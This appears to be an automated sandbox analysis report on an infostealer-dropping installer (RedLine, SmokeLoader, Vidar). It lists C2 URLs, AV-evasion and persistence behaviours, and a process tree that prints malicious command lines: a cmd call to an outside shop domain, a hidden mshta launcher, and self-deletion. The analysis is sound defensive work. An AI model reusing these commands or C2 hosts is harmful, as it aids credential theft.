redline | 5440a5863002acacb3ddb6b1deb84945aa004ace8bd64938b681e3fe059a8a23

Analysis

max time kernel
139s
max time network
186s
platform
windows10_x64
resource
win10v20201028
submitted
06-03-2021 07:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Install.exe
Size

852KB
MD5

98d1321a449526557d43498027e78a63
SHA1

d8584de7e33d30a8fc792b62aa7217d44332a345
SHA256

5440a5863002acacb3ddb6b1deb84945aa004ace8bd64938b681e3fe059a8a23
SHA512

3b6f59dbd605e59152837266a3e7814af463bb2cd7c9341c99fc5445de78e2dde73c11735bd145c6ad9c6d08d2c2810155558d5e9c441ac8b69ed609562385d0

Score

10^/10

redline smokeloader vidar backdoor evasion infostealer persistence stealer trojan upx

Malware Config

Extracted

Family

smokeloader

Version

2019

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/

rc4.i32

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

resource	yara_rule
behavioral4/memory/6852-385-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral4/files/0x000100000001abc0-111.dat	acprotect
behavioral4/files/0x000100000001abc0-110.dat	acprotect

Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Executes dropped EXE 16 IoCs

pid	Process
3244	multitimer.exe
3488	multitimer.exe
640	multitimer.exe
1688	vict.exe
748	vm0a2bdegt4.exe
1768	IBInstaller_97039.exe
2904	askinstall24.exe
2880	vict.tmp
720	gi3tpwy1sjt.exe
808	1nwdsdrt3mu.exe
1332	safebits.exe
2772	IBInstaller_97039.tmp
2852	Setup3310.exe
1504	gi3tpwy1sjt.tmp
3624	vpn.exe
3296	chashepro3.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/0x000100000001abc0-111.dat	upx
behavioral4/files/0x000100000001abc0-110.dat	upx

Loads dropped DLL 2 IoCs

pid	Process
2880	vict.tmp
2772	IBInstaller_97039.tmp

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ey0mwzu0zha = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\FU4PL1TSUU\\multitimer.exe\" 1 3.1615014594.60432ac28c2e6"	multitimer.exe

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
174	ipinfo.io
208	ipinfo.io
240	ipinfo.io
245	ipinfo.io
66	ipinfo.io
70	ipinfo.io
140	ipinfo.io
149	checkip.amazonaws.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Program crash 8 IoCs

pid	pid_target	Process	procid_target
5372	488	WerFault.exe	123
5580	488	WerFault.exe	123
5704	488	WerFault.exe	123
6088	488	WerFault.exe	123
1400	5916	WerFault.exe	152
5524	488	WerFault.exe	123
1956	488	WerFault.exe	123
4120	488	WerFault.exe	123

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
6960	timeout.exe
6992	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
5516	taskkill.exe
6588	TASKKILL.exe
6668	taskkill.exe
6736	taskkill.exe
5496	taskkill.exe

Runs .reg file with regedit 2 IoCs

pid	Process
6596	regedit.exe
6596	regedit.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
6536	PING.EXE

Script User-Agent 6 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	67	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	78	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	139	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	173	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	205	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	241	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 54 IoCs

pid	Process
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe
640	multitimer.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	8	Install.exe
Token: SeDebugPrivilege	3244	multitimer.exe
Token: SeDebugPrivilege	640	multitimer.exe
Token: SeDebugPrivilege	748	vm0a2bdegt4.exe

Suspicious use of WriteProcessMemory 43 IoCs

description	pid	Process	procid_target
PID 8 wrote to memory of 3244	8	Install.exe	75
PID 8 wrote to memory of 3244	8	Install.exe	75
PID 3244 wrote to memory of 3488	3244	multitimer.exe	80
PID 3244 wrote to memory of 3488	3244	multitimer.exe	80
PID 3488 wrote to memory of 640	3488	multitimer.exe	81
PID 3488 wrote to memory of 640	3488	multitimer.exe	81
PID 640 wrote to memory of 1688	640	multitimer.exe	82
PID 640 wrote to memory of 1688	640	multitimer.exe	82
PID 640 wrote to memory of 1688	640	multitimer.exe	82
PID 640 wrote to memory of 1768	640	multitimer.exe	84
PID 640 wrote to memory of 1768	640	multitimer.exe	84
PID 640 wrote to memory of 1768	640	multitimer.exe	84
PID 640 wrote to memory of 748	640	multitimer.exe	83
PID 640 wrote to memory of 748	640	multitimer.exe	83
PID 640 wrote to memory of 2904	640	multitimer.exe	128
PID 640 wrote to memory of 2904	640	multitimer.exe	128
PID 640 wrote to memory of 2904	640	multitimer.exe	128
PID 1688 wrote to memory of 2880	1688	vict.exe	127
PID 1688 wrote to memory of 2880	1688	vict.exe	127
PID 1688 wrote to memory of 2880	1688	vict.exe	127
PID 640 wrote to memory of 720	640	multitimer.exe	126
PID 640 wrote to memory of 720	640	multitimer.exe	126
PID 640 wrote to memory of 720	640	multitimer.exe	126
PID 640 wrote to memory of 808	640	multitimer.exe	89
PID 640 wrote to memory of 808	640	multitimer.exe	89
PID 640 wrote to memory of 1332	640	multitimer.exe	88
PID 640 wrote to memory of 1332	640	multitimer.exe	88
PID 640 wrote to memory of 1332	640	multitimer.exe	88
PID 1768 wrote to memory of 2772	1768	IBInstaller_97039.exe	85
PID 1768 wrote to memory of 2772	1768	IBInstaller_97039.exe	85
PID 1768 wrote to memory of 2772	1768	IBInstaller_97039.exe	85
PID 640 wrote to memory of 2852	640	multitimer.exe	87
PID 640 wrote to memory of 2852	640	multitimer.exe	87
PID 640 wrote to memory of 2852	640	multitimer.exe	87
PID 720 wrote to memory of 1504	720	gi3tpwy1sjt.exe	86
PID 720 wrote to memory of 1504	720	gi3tpwy1sjt.exe	86
PID 720 wrote to memory of 1504	720	gi3tpwy1sjt.exe	86
PID 640 wrote to memory of 3624	640	multitimer.exe	125
PID 640 wrote to memory of 3624	640	multitimer.exe	125
PID 640 wrote to memory of 3624	640	multitimer.exe	125
PID 640 wrote to memory of 3296	640	multitimer.exe	90
PID 640 wrote to memory of 3296	640	multitimer.exe	90
PID 640 wrote to memory of 3296	640	multitimer.exe	90

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:8
- C:\Users\Admin\AppData\Local\Temp\FU4PL1TSUU\multitimer.exe
  "C:\Users\Admin\AppData\Local\Temp\FU4PL1TSUU\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3244
- - C:\Users\Admin\AppData\Local\Temp\FU4PL1TSUU\multitimer.exe
    "C:\Users\Admin\AppData\Local\Temp\FU4PL1TSUU\multitimer.exe" 1 3.1615014594.60432ac28c2e6 101
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:3488
  - - C:\Users\Admin\AppData\Local\Temp\FU4PL1TSUU\multitimer.exe
      "C:\Users\Admin\AppData\Local\Temp\FU4PL1TSUU\multitimer.exe" 2 3.1615014594.60432ac28c2e6
      4⤵
      Executes dropped EXE
      Checks for any installed AV software in registry
      Maps connected drives based on registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:640
    - - C:\Users\Admin\AppData\Local\Temp\2b5blq31kd5\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2b5blq31kd5\vict.exe" /VERYSILENT /id=535
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1688
      - C:\Users\Admin\AppData\Local\Temp\is-EC290.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-EC290.tmp\vict.tmp" /SL5="$A0062,870426,780800,C:\Users\Admin\AppData\Local\Temp\2b5blq31kd5\vict.exe" /VERYSILENT /id=535
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2880
    - - C:\Users\Admin\AppData\Local\Temp\3ejnv0pq2fh\vm0a2bdegt4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3ejnv0pq2fh\vm0a2bdegt4.exe" testparams
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:748
      - C:\Users\Admin\AppData\Roaming\ocwl1yrr5ds\yd4se4z3glg.exe
        
        "C:\Users\Admin\AppData\Roaming\ocwl1yrr5ds\yd4se4z3glg.exe" /VERYSILENT /p=testparams
        6⤵
        
        PID:4068
        
        C:\Users\Admin\AppData\Local\Temp\is-FGMCO.tmp\yd4se4z3glg.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FGMCO.tmp\yd4se4z3glg.tmp" /SL5="$7005A,404973,58368,C:\Users\Admin\AppData\Roaming\ocwl1yrr5ds\yd4se4z3glg.exe" /VERYSILENT /p=testparams
        7⤵
        
        PID:2188
    - - C:\Users\Admin\AppData\Local\Temp\pnesj2gs5fr\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pnesj2gs5fr\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1768
      - C:\Users\Admin\AppData\Local\Temp\is-DR9FM.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DR9FM.tmp\IBInstaller_97039.tmp" /SL5="$5002E,14452723,721408,C:\Users\Admin\AppData\Local\Temp\pnesj2gs5fr\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2772
        
        C:\Users\Admin\AppData\Local\Temp\is-05SSA.tmp\{app}\chrome_proxy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-05SSA.tmp\{app}\chrome_proxy.exe"
        7⤵
        
        PID:4980
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-05SSA.tmp\{app}\chrome_proxy.exe"
        8⤵
        
        PID:6324
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost -n 4
        9⤵
        Runs ping.exe
        
        PID:6536
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
        7⤵
        
        PID:4932
    - - C:\Users\Admin\AppData\Local\Temp\xmn4yuvwvv5\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\xmn4yuvwvv5\Setup3310.exe" /Verysilent /subid=577
        5⤵
        Executes dropped EXE
        
        PID:2852
      - C:\Users\Admin\AppData\Local\Temp\is-D2A2I.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-D2A2I.tmp\Setup3310.tmp" /SL5="$50058,802346,56832,C:\Users\Admin\AppData\Local\Temp\xmn4yuvwvv5\Setup3310.exe" /Verysilent /subid=577
        6⤵
        
        PID:416
        
        C:\Users\Admin\AppData\Local\Temp\is-7RPHJ.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-7RPHJ.tmp\Setup.exe" /Verysilent
        7⤵
        
        PID:3808
        
        C:\Users\Admin\AppData\Local\Temp\is-PATG9.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PATG9.tmp\Setup.tmp" /SL5="$302C0,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-7RPHJ.tmp\Setup.exe" /Verysilent
        8⤵
        
        PID:3388
        
        C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\ProPlugin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\ProPlugin.exe" /Verysilent
        9⤵
        
        PID:5604
        
        C:\Users\Admin\AppData\Local\Temp\is-MH2AQ.tmp\ProPlugin.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-MH2AQ.tmp\ProPlugin.tmp" /SL5="$204A0,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\ProPlugin.exe" /Verysilent
        10⤵
        
        PID:5796
        
        C:\Users\Admin\AppData\Local\Temp\is-HSC9R.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-HSC9R.tmp\Setup.exe"
        11⤵
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
        12⤵
        
        PID:5052
        
        C:\Windows\SYSTEM32\TASKKILL.exe
        
        TASKKILL /F /IM chrome.exe
        13⤵
        Kills process with taskkill
        
        PID:6588
        
        C:\Windows\regedit.exe
        
        regedit /s chrome.reg
        13⤵
        Runs .reg file with regedit
        
        PID:6596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chrome64.bat
        13⤵
        
        PID:6796
        
        C:\Windows\system32\mshta.exe
        
        mshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)
        14⤵
        
        PID:7064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\chrome64.bat" h"
        15⤵
        
        PID:4064
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:/Program Files/Google/Chrome/Application/chrome.exe"
        16⤵
        
        PID:5632
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xe4,0xe8,0xec,0xc0,0xf0,0x7ffe67056e00,0x7ffe67056e10,0x7ffe67056e20
        17⤵
        
        PID:2608
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2072 /prefetch:8
        17⤵
        
        PID:4968
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2836 /prefetch:1
        17⤵
        
        PID:6768
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2552 /prefetch:1
        17⤵
        
        PID:6788
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2060 /prefetch:8
        17⤵
        
        PID:6320
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2004 /prefetch:2
        17⤵
        
        PID:4324
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:1
        17⤵
        
        PID:1460
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
        17⤵
        
        PID:5128
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
        17⤵
        
        PID:4112
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
        17⤵
        
        PID:4408
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4596 /prefetch:8
        17⤵
        
        PID:7044
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4476 /prefetch:8
        17⤵
        
        PID:7124
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
